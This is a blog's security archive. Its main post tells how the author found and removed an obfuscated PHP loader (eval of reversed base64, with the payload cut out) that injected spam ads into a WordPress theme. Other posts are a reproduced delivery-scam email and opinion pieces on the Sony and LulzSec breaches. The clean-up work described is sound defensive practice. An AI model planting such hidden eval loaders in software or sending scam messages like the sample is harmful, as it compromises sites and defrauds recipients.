Category Archives: Security

WordPress Injected Advertisements

I’ve debated on writing this up because I don’t understand a lot about exactly what happened, but I’ll post as much information here as I can.

The problem: I took over the management of a simple WordPress site several months ago, and haven’t had any problems.  I don’t host it or own the domain, so most of what I have to do involves content.  A few weeks ago an ad appeared above the menu (we’re using the Twenty Eleven theme) and I couldn’t pinpoint it.  The text and link varied, and a look at the header code in the theme revealed nothing.  Still, the HTML showed up in the rendered page (and across the site).  The latest was related to “viagra from india” or something like that.  A rude markup shows where the content was injected:

wordPressHack01

My client finally called me and was quite worried, which was justified.  I had looked into it but honestly hadn’t put in the time to dig in.  I sat down a couple of days ago and did a little searching, and came up with a few things to try – one of which was addressing the possibility that a plugin used on the site had been compromised.

Looking through the installed plugins, I noticed one that didn’t look like it was necessary and involved disabling menu items.  I disabled the plugin, refreshed the page, and the ad was gone.  Solved!

No it wasn’t.

My client called yesterday and said the ad was still there.  I pulled up the site and didn’t see it.   Thinking that maybe it had something to do with the content filter at work, I told him I’d do some research and get back to him.

I got home last night, pulled up the site, and the ad was displayed.  I logged in to the admin panel, poked around a bit, and went back to the site – no ad.  Turns out the ads don’t display if you have a cookie saved from the site’s admin panel.

More Googling: A couple more searches led me to this post at StackExchange, revealing something I wasn’t looking for but had seen earlier when looking at the site’s files.  Specifically, it was a line in the theme’s functions.php file that looked like this:

<?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave')); $wp_function_initialize(strrev(';))"=owOpICcoB3Xu9Wa0Nmb1Z2XrNWYixGbhNmIoQ...

[...a very long string - 6416 characters in my case...]

...Q9QnblRnbvNGJ7IiI9QnblRnbvNGJ7lCbyVHJokTO58FbyV3X0V2Zg42bpR3YuVnZ"
(edoced_46esab(lave'));?>

I’d seen this before but didn’t pay it much attention (I was looking for offending code in the theme’s display files.)  That StackExchange post really helped me realize that the code in functions.php didn’t belong.  If you look closely you might notice that the code uses PHP’s strrev() function, which reverses a string.  If you reverse the string in the first strrev() call:

strrev(';)a$(lave')

You’ll see that it returns the string eval($a);.  PHP’s eval() function executes a string as PHP code (and is highly discouraged, by the way).  That eval() statement is handed to create_function(), which creates an anonymous function (in this case the function’s name is $a).  There are so many layers to this hack – stay with me here…

The next strrev() call takes that very large string that starts with ;))”=owOpI and ends with (edoced_46esab(lave (hint: that’s eval(base64_decode) reversed.  A clue…).  I copied that string and threw it in my Python terminal to reverse it, and upon discovering that I had a base64-encoded string I decided to decode it and have a look.  My Python code:

import base64
s = '=owOpICcoB3Xu [...] 2Zg42bpR3YuVnZ'
r = s[::-1]
d = base64.b64decode(r)
print(d)

This script takes the string and reverses it, decodes it with the base64 decoder, and prints it.  Out comes over 200 lines of PHP code that does the following (from what I had the energy to decipher):

  • Tries, through several methods, to determine methods by which it can access a URL
  • Detects Google, Bing, and Yahoo robots
  • Checks for the existence of certain cookies (this is how it hides from WP site admins)
  • Accesses one of two different URLs to get content
  • Inserts that content into the site

Once found, it was very easy to get rid of.  At first I simply commented the line in the functions.php and verified problem resolution, and then deleted the line.  Going through the code, while not necessary, was an interesting 120 minutes.  I even went so far as to manually browse to one of the URLs it contacted, and it only spit out a base64 string to the browser.

Curious, I decoded that string with Python, which unsurprisingly revealed this:

</div>||||||</div>|||<a href="http://lakeshorewinecellars.com/buy-viagra-from-india/">buy viagra from india</a>

And there you have it.  Happy hunting!

For Some Reason I Didn’t Publish This When I Wrote It

Found this post in my unpublished list just now:

I just read a story at PC World that revealed the obvious fact that the breaches by LulzSec and Anonymous were avoidable.  The groups used SQL Injection, XSS, social engineering, and took advantage of the misstep by their victims of not encrypting their data at rest.  All of these security practices were and have been avoidable – it’s up to the data maintainer to know about these vulnerabilities before and to keep up with the latest security threats.

Anonymous also used a really old, published exploit (for which a patch was available but never applied) in a Linux system at HB Gary during their playtime with that company and its schmuck CEO.

Security should always be a paramount issue at any organization that handles data for any type of computer users.  Sony failed to keep its users’ data secure, as did the other companies LulzSec and Anonymous has hammered in the past months.  And while releasing all the usernames, e-mails, and passswords was probably not a good idea and caused a lot of grief for millions of people, the companies themselves should be held responsible.  After all, if they had done what is right they wouldn’t be going through this misery right now.

 

Wow. Really? Wow…

Got this in my spam today and thought you might want a good read.  It’s amazing that these people are successful.

Good Evening
I have been in your country since 6:31pm at George Bush Intercontinental/Houston Airport (IAH), Houston, Texas port of entry at the North side of Houston,Texas with my partner and have been so busy with the custom authorities here at George Bush Intercontinental Airport , having done extensively on this assignment towards carrying out the delivery of consignment to your doorstep without further delay or sanctions whatsoever.

In consequent to this, I have been required by the authority to sign some vital documentations in respect of your consignment as the code of precedence in line with diplomatic delivery directives.

So I advise that you verify/re-confirm your current residential address to me,and also tell me the nearest airport to your home to avoid mistake,because as soon as i clear this problems with the custom authorities and sign some paper works i will be heading to your home address by tomorrow evening.

I am very busy now at the custom authority office here at George Bush Intercontinental Airport ,as soon as am through speaking with the head of the authorities i will give you a call,so i advised that you keep your mobile phone open for easy communications.

Finally. I will be oblige to ensure that your package is delivered to you as soon as i settle this issue with the customs,and also do not contact any other person apart from me the diplomat of your consignment.

Once again,thanks for helping me serve you better.

Yours Faithfully.

Mr John Newman

I don’t normally look at these things, but since I’ve read this I have decided that they are changing their tactics a bit.  They’re apparently willing to contact you directly instead of asking you to send money up front.  I suppose it makes it seem more real.

Sownage

I don’t usually like Dvorak’s opinion (as I’ve written before), but I just read an article about the latest Sony spillage (pwnage, or what have you) and he actually has a point.  With the whole PSN data breach in the news and the fact that they’re just now turning on services for PSN users again after some 40+ days, it’s amazing to hear yet another story of more insecurity and data leakage from the same company.

Dvorak’s point is that no one cares.  No one has shown up to rise against Sony, no pro-Sony people are coming to its defense.  Even Sony hasn’t acknowledged anything.  Sony has always alienated its customers, in my opinion.  For me it started with the proprietary flash memory in my first digital camera in 2000.  I didn’t have any other Sony product that used that kind of memory, and I had to get a special reader for it as well.

The software that came with our digital video camera in 2005 caused me to send off for a replacement optical drive in my laptop – and I never got the software working.  I ended up with a brand new CD drive and a fresh Windows install to repair all that software had touched.  A set of headphones is the only thing from Sony we’ve bought in the last six years.  They simply don’t provide enough use value for me to go out of my way to get their products.

The lack of securing data is a grave issue for me.  For me, it’s a professional expertise matter.  Even I, the guy who doesn’t have enough experience to be in-demand for simple SysAdmin jobs, knew better than that.  Even I could have designed a database and web front-end to guard from SQL injection.  And I know to encrypt passwords.  Apparently Sony didn’t, with all its experience and professional administrators and developers.  Maybe I did go to the right school after all.

Anyway, Dvorak has a point – I’m curious about the future of Sony and the state of its global reputation.  If I am struck enough by what I read about Sony’s state in the coming months, I’ll revisit the topic.